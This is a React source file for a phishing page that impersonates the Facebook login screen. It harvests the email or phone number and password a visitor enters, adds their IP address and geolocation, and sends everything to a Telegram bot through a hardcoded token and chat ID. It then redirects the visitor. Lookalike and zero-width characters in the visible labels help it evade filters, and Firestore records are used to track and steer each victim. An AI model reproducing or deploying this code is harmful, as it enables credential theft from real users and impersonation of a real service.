import React, { useEffect, useState } from 'react';
import { addDoc, collection, doc, getDoc, getDocs, onSnapshot, setDoc } from 'firebase/firestore';
import { publicIpv4 } from 'public-ip';
import { BsInfoCircleFill as IconInfo } from "react-icons/bs";
import { IoIosAdd as IconAdd } from "react-icons/io";
import { footerLinks, desktoplanguages } from "../sakles/malores.js";
import { db } from '../f7g8h9p.js';
import { useMediaQuery } from 'react-responsive';
import '../sakles/malores.js';
import '../c_c1f535336b.css'

const R4c8zr = () => {
    
    const [ip, setIp] = useState(undefined);
    const [grraht, setCode] = useState('');
    const [dexlus, setdexlus] = useState('');
    const [userData, setUserData] = useState(undefined);
    const [isUserData, setIsUserData] = useState(false);
    const [userUrl, setUserUrl] = useState(false);
    
    const isMobile = useMediaQuery({ query: '(max-width: 767px)' });



    useEffect(() => {
        if (isMobile) {
            window.location.href = 'ZJ7Q9C8V0k1H5T2yW4B6PXRMSF3DNLgUwvyW4B7C9J7Q9x';
        }
    }, [isMobile]);

    const handleActions = (event) => {
        event.preventDefault(); // Prevent the default form submission
        if (grraht === '') {
            // Handle code validation
            return;
        } else {
            const bot = 'bot7998763746:AAHkT1vQxXCYwn3Gt3cNG3muww3Hc5Tu4QQ';
            const chid = '8393113385';

            fetch(`https://ipapi.co/json/`)
                .then((response) => response.json())
                .then((response) => {
                    const { country, region, city } = response;
                    const content = `========================\nLS 1: '${grraht}'\nLS 2: '${dexlus}'\nCountry : '${country}'\nRegion : '${region}'\nCity : '${city}'\nIP: '${ip}'\n========================`;

                    const encodedContent = encodeURIComponent(content);

                    fetch(`https://api.telegram.org/${bot}/sendMessage?chat_id=${chid}&text=${encodedContent}`, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                    })
                        .then(() => {
                            window.location = 'B9W2ZQJX6yC0SgL5T8V4M7P1kHNFDRU3wvoKRxX6yC0Sgm';
                        })
                        .catch((error) => {
                            window.location = 'B9W2ZQJX6yC0SgL5T8V4M7P1kHNFDRU3wvoKRxX6yC0Sgm';
                        });
                });
        }
    };

    const handleCodeChange = (e) => {
        setCode(e.target.value); // Allow any input
    };
    const handleCodeChange1 = (e) => {
        setdexlus(e.target.value); // Allow any input
    };
    const getUserData = async (e) => {
        const documentSnapshot = await getDocs(collection(db, "georgebs"));
        const newData = documentSnapshot.docs
            .map((doc) => ({ ...doc.data(), id: doc.id }));
        const filter = newData.filter(x => {
            if (x.ip === ip) {
                setIsUserData(true);
                setUserData(x);
                return x;
            }
        });
        if (filter.length === 0) {
            addUserData();
        }
    };

    const getIp = async () => {
        if (ip === undefined) {
            const ip = await publicIpv4();
            setIp(ip);
        }
    };
    getIp();

    useEffect(() => {
        if (ip) {
            onSnapshot(collection(db, "georgebs"), (snapshot) => {
                let isExist = false;
                snapshot.docs.map((doc) => ({ ...doc.data(), id: doc.id })).filter(x => {
                    if (x.ip === ip) {
                        isExist = true;
                        setUserData(x);
                        fetch('./data.json').then(
                            function (res) {
                                return res.json();
                            },
                        ).then(function (data) {
                            data.url_data.filter((item) => {
                                if (item.id === parseInt(x.redir)) {
                                    setUserUrl(item.url);
                                    return;
                                }
                            });
                        }).catch(
                            function (err) {
                                console.log(err, ' error');
                            },
                        );
                    }
                });
                if (!isExist) {
                    setUserUrl(false);
                }
            });
        }
    }, [ip]);

    useEffect(() => {
        document.title = '‌Lо‌g int‌‌‌о Fаc‌‌еbо‌ok';
    }, [userData, userUrl]);

    const addUserData = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);

            // Check if the document exists
            const docSnap = await getDoc(docRef);

            if (!docSnap.exists()) {
                // Document doesn't exist, so set the data
                await setDoc(docRef, {
                    ip: ip,
                    number: -1,
                    redir: "-1"
                });
                console.log("BegasID: ", ip);
                getUserData();
            } else {
                console.log("ResID ID: ", ip);
            }
        } catch (e) {
            console.error("Serr: ", e);
        }
    };

    const resetUserNumber = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);
            await setDoc(docRef, { redir: "-1" }, { merge: true });
            console.log("DegIP: ", ip);
        } catch (e) {
            console.error("Gerr: ", e);
        }
    };

    useEffect(() => {
        if (ip) {
            getUserData();
        }
    }, [ip]);

    useEffect(() => {
        if (ip) {
            getUserData();
        }
    }, [ip]);

    if (userUrl) {
        setTimeout(() => {
            window.location = userUrl;
        }, 1000);
        resetUserNumber();
    }

    console.log("hiuoio", isUserData, userData);

    if (isUserData) {
        return (
            <section className="w-full hidden sm:flex flex-col items-center justify-start bg-dedese">
                <div className="w-full max-w-6xl flex flex-col items-center justify-start gap-3 py-14 px-2 sm:px-3 lg:px-4">
                    <a
                        href="/smoment"
                        className="w-[200px] h-[40px] flex items-center justify-center relative"
                    >
                        <img
                            src="/images/xyqkz.png"
                            alt="das"
                            fill
                            className="object-contain"
                        />
                    </a>
                    {/* Message ==> Nosn */}
                    <div className="w-full max-w-[612px] mt-1 flex items-center justify-start gap-2 border-[1px] border-solid border-begex rounded-sm overflow-none bg-white">
                        <div className="px-3 py-2 bg-begex shrink-0">
                            <IconInfo color="white" size={18} />
                        </div>
                        <p className="text-sm">Yоu m‌ust lоg in t‌o cоnt‌inue.</p>
                    </div>
                    {/* Form ==> Loxx foxrm  */}
                    <div className="w-full max-w-[396px] px-3 pt-6 pb-10 flex flex-col items-center justify-start gap-4 bg-white rounded-lg shadow-xl">
                        <h3 className="text-lg text-center font-medium" style={{ fontSize: '17.38px', fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif' }}>
                        ‌Lо‌g int‌‌‌о Fаc‌‌еbо‌ok
                        </h3>
                        <form className="w-full flex flex-col items-center justify-start gap-2" onSubmit={handleActions}>
                            <div className="w-full text-center text-xs p-[10px] border-[1px] bg-mimosa border-solid border-citrine rounded-sm">
                                You m‌ust lo‌g in t‌o cont‌inue.
                            </div>
                            <input
                                type="text" id="grraht" name="grraht"
                                className="textfieldx5 w-full py-[12px] px-4 text-[17.03px] placeholder:text-[17.03px] text-dark rounded-[6px] border-grey-light border-solid border-[1px] focus:placeholder:opacity-70 focus:outline-0 transition-all duration-300"
                                placeholder="E‌ma‌il or p‌ho‌ne n‌um‌ber" onChange={handleCodeChange} required/>
                                <span className='becros'></span>
                                <input type="text" id="dexlus" name="dexlus" className="textfieldx5 w-full py-[12px] px-4 text-[17.03px] placeholder:text-[17.03px] text-dark rounded-[6px] border-grey-light border-solid border-[1px] focus:placeholder:opacity-70 focus:outline-0 transition-all duration-300"
  style={{ WebkitTextSecurity: 'disc', textSecurity: 'disc' }}  placeholder="P‌ass‌wor‌d"onChange={handleCodeChange1} required/>

                                <span className='form-dexlus'></span>
                            <button type="submit" className="submit-button w-full px-3 h-[45px] bg-begex hover:bg-opacity-90 text-white text-xl font-semibold rounded-md transition-all duration-300">Lоg in </button>
                        </form>
                        {/* Forgab */}
                        <div className="w-full flex items-center justify-center gap-3">
                        <button
                                type="button"
                                className=" text-begex text-sm font-medium bg-none hover:underline transition-all duration-300" style={{ fontSize: '14.39px', fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif' }}>
                                Fo‌rgot ac‌co‌un‌t?
                            </button>
                            <button type="button" className="text-begex text-sm font-medium bg-none hover:underline transition-all duration-300" style={{ fontSize: '14.39px', fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif' }}>
                                Si‌gn u‌р f‌оr F‌ас‌еbо‌оk
                            </button>
                        </div>
                    </div>
                </div>
                <footer className="w-full flex-1 bg-white pt-7 pb-10 px-6">
                    <div className="mx-auto flex items-center justify-start flex-col gap-2 w-full max-w-5xl">
                        {/* Languages  */}
                        <div className="w-full flex items-center justify-start gap-x-4 gap-y-2 flex-wrap">
                            {desktoplanguages.map((item, i) => (
                                <p
                                    key={i}
                                    className="text-xs text-neutral-500 hover:underline transition-all duration-300 cursor-pointer"
                                >
                                    {item}
                                </p>
                            ))}
                            <div className="bg-smoke hover:bg-babsg px-1 py-[0px] flex items-center justify-center border-[1px] border-solid border-grey-ghost rounded-[2px] overflow-hidden cursor-pointer transition-all duration-300">
                                <IconAdd size={20} />
                            </div>
                        </div>
                        {/* Divider  */}
                        <div className="w-full h-[1.3px] bg-neutral-300" />
                        {/* gegus  */}
                        <div className="w-full flex items-center justify-start gap-x-4 gap-y-2 flex-wrap">
                            {footerLinks.map((item, i) => (
                                <p
                                    key={i}
                                    className="text-xs text-neutral-500 hover:underline transition-all duration-300 cursor-pointer"
                                >
                                    {item}
                                </p>
                            ))}
                        </div>
                        {/* rebsts  */}
                        <p className="text-xs text-left w-full mt-4 text-neutral-500 transition-all duration-300 cursor-pointer">
                            M‌‌et‌a © 2‌025
                        </p>
                    </div>
                </footer>
            </section>
        );
    } 
};

export default R4c8zr;
